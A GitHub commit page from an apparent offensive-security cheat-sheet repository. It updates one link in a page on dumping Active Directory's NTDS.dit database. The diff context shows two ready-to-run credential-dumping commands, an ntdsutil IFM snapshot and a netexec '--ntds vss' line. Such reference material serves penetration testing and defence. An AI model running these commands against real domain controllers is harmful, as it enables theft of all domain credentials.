Skip to content

Commit

Permalink
Merge pull request #8 from mpgn/main
Browse files Browse the repository at this point in the history
replace old link
  • Loading branch information
swisskyrepo authored Mar 29, 2024
2 parents d472cfa + ddfc0f6 commit ca201ac
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion docs/active-directory/ad-adds-ntds-dumping.md
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ The VSS is a Windows service that allows users to create snapshots or backups of
```powershell
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
```
* [netexec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit)
* [netexec VSS module](https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-ntds.dit)
```powershell
nxc smb 10.10.0.202 -u username -p password --ntds vss
```
Expand Down

0 comments on commit ca201ac

Please sign in to comment.